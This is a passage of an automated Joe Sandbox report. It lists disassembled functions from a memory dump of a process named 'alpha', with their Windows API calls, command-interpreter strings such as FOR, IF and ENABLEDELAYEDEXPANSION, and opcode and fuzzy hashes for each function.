                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseDeleteValue$CreateOpen
                              • String ID: %s=%s
                              • API String ID: 1019019434-1087296587
                              • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction ID: 9d44f525145640c7b39c463dc3ad528ab05c914b5cfee0453faf2141285b556a
                              • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction Fuzzy Hash: 4A519331B0CB52C6E760BF66A48476AB6A1FB89790F884234CE5D83BD8DF39D441D710
                              Function 00007FF744F03D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                              • String ID: %9d
                              • API String ID: 1006866328-2241623522
                              • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction ID: eb09f090510d4698a4e6352788c1364ff7fa4911b5ddc402d08d82a212640135
                              • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction Fuzzy Hash: 11516E72A0C642CAE700FF52A8845A9BBA0FB44764FC94635DE6D537D9CF3CE544AB20
                              Function 00007FF744F0D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 2081463915-1994581435
                              • Opcode ID: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                              • Instruction ID: e4cfa7019165d66532d251d3522cb9514d7b272bac0d6f968ef544af81e608a6
                              • Opcode Fuzzy Hash: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                              • Instruction Fuzzy Hash: 23719A20E0D256C6FB64BF67A8C8275A6A0EF90740FCC4539DE1D426EDDF3CB481A621
                              Function 00007FF744F102A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$iswspacewcschr
                              • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                              • API String ID: 840959033-3627297882
                              • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                              • Instruction ID: a7a3926cad63f622b5e07480e75fbd687ff7b18a33b747467252705f04ca9a4a
                              • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                              • Instruction Fuzzy Hash: CCD11921A0C653C6FB50BF63A8C52B9A6A0AF54B44FCC5035DE4D466EEDE3CE905A730
                              Function 00007FF744F032B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • _get_osfhandle.MSVCRT ref: 00007FF744F032F3
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF744F032A4), ref: 00007FF744F03309
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F03384
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F211DF
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                              • String ID:
                              • API String ID: 611521582-0
                              • Opcode ID: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction ID: 7d0347e0f821baaf050b10e2ffad0585b0238758c56454e3d3d2112cf9cdec78
                              • Opcode Fuzzy Hash: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction Fuzzy Hash: 8EA18132B0C612CBF714BF62A8842BDEAA1FB89B55F895135CD0E467C8DF3C94459620
                              Function 00007FF744F126E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CreateFile_open_osfhandle
                              • String ID: con
                              • API String ID: 2905481843-4257191772
                              • Opcode ID: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                              • Instruction ID: 746d794112acb6530e2a6ff26cc5ccc8e0a1ade66c8cd796d3da553ef2236f6a
                              • Opcode Fuzzy Hash: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                              • Instruction Fuzzy Hash: 3B71743260C681CAE760BF56A480679FAA0FB49B61F994234DE5D427D8DF3CD8459B10
                              Function 00007FF744F31A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                              • String ID: CSVFS$NTFS$REFS
                              • API String ID: 3510147486-2605508654
                              • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                              • Instruction ID: 9f4b5936edc2866ff2910dc7e2726382f52930e4d73e31ab811d6cd979096073
                              • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                              • Instruction Fuzzy Hash: DF614B32608BC2CAEB65AF22D8843E9B7A4FB45B85F884135CE0D4B798DF78D108D710
                              Function 00007FF744F072B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                              Download Yara Rule
                              APIs
                              • longjmp.MSVCRT(?,00000000,00000000,00007FF744F07279,?,?,?,?,?,00007FF744F0BFA9), ref: 00007FF744F24485
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: longjmp
                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                              • API String ID: 1832741078-366822981
                              • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                              • Instruction ID: 109a54b415bf797ec0dfebacb15f12dd6c5695099882bd940f00190373921ac1
                              • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                              • Instruction Fuzzy Hash: 8AC17C20E0CA42C2F724FE5791C66B9A791BB86B84FDC1036DD0D976D9CF7EA445A320
                              Function 00007FF744F0B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • memset.MSVCRT ref: 00007FF744F0BA2B
                              • wcschr.MSVCRT ref: 00007FF744F0BA8A
                              • wcschr.MSVCRT ref: 00007FF744F0BAAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heapwcschr$AllocProcessmemset
                              • String ID: -$:.\$=,;$=,;+/[] "
                              • API String ID: 2872855111-969133440
                              • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                              • Instruction ID: 59741425758ddda153433a6607d33792f22b7ed85af1229b3d19ae8a17905996
                              • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                              • Instruction Fuzzy Hash: E2B15021A1D682C2EB60BF5694C8279A6A0FB84B84FD94135CE5E477D8DF3CE845A320
                              Function 00007FF744F1662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                              Download Yara Rule
                              APIs
                              • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F16677
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F1668F
                              • _errno.MSVCRT ref: 00007FF744F166A3
                              • wcstol.MSVCRT ref: 00007FF744F166C4
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166E4
                              • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$_errnoiswalphawcschrwcstol
                              • String ID: +-~!$APerformUnaryOperation: '%c'
                              • API String ID: 2348642995-441775793
                              • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                              • Instruction ID: 15892242fbd41ab1058907dab7ef25dced591be2279c1aca43cd1de7ec2e8cb4
                              • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                              • Instruction Fuzzy Hash: C6712C6290CA46C6F7607F16D490279B7B0EB49B94B98D135DE4E062D8EF3CAC84E720
                              Function 00007FF744F086B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$_wcsicmp$AllocProcess
                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                              • API String ID: 3223794493-3086019870
                              • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                              • Instruction ID: 12d4b15e22430fa8dd1971d9ce4685fcf6ae55beeeabca1876c5fac0c510c836
                              • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                              • Instruction Fuzzy Hash: 84516C21A0CA42C6EB14BF16A484179ABA0FB59B90FDC9135CE5E073E8DF3CE445A720
                              Function 00007FF744F286FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LocalTime$ErrorLast_get_osfhandle
                              • String ID: %s$/-.$:
                              • API String ID: 1644023181-879152773
                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction ID: afbb29a62f2e140d1c20b5992957d8a12a6f4bc0d4d98db597663a07c6026f40
                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction Fuzzy Hash: 4E919322A0CA42D2EB10BF66D4802B9E6A0FF84B84FCC4235DD4E426DDDE3DE545E721
                              Function 00007FF744F2627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F27251), ref: 00007FF744F2628E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ObjectSingleWait
                              • String ID: wil
                              • API String ID: 24740636-1589926490
                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction ID: 0a26a06a6b134e2d57132ff0621672f8f352521033e60e0a25c2c95e3e95aebf
                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction Fuzzy Hash: A9413F21A0C542C3F7607F12E48027AA6A1FF85785FE89131DD4946BD8DF3EE845A721
                              Function 00007FF744F2CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                              • String ID: $Application$System
                              • API String ID: 3377411628-1881496484
                              • Opcode ID: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction ID: 7d003354ed1d1cc055c6362b48e16dd0549a41830c45f8198357cbd72b7a286f
                              • Opcode Fuzzy Hash: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction Fuzzy Hash: 37411C32B08A41DAE720AF61E4803EDB7A5FB89748F885135DE4E42B98EF3CD145C750
                              Function 00007FF744F1258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              • _wcsicmp.MSVCRT ref: 00007FF744F125CA
                              • _wcsicmp.MSVCRT ref: 00007FF744F125E8
                              • _wcsicmp.MSVCRT ref: 00007FF744F1260F
                              • _wcsicmp.MSVCRT ref: 00007FF744F12636
                              • _wcsicmp.MSVCRT ref: 00007FF744F12650
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$Heap$AllocProcess
                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                              • API String ID: 3407644289-1668778490
                              • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction ID: 4d3e807708b7a280612284a41794b0d11a3177ec574e75bba1fe25758d262200
                              • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction Fuzzy Hash: 81311D21A1C542C6F7107FA3E895279E6A4AF84B40F9D8035DE0E562DDDE3CE804E721
                              Function 00007FF744F17E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
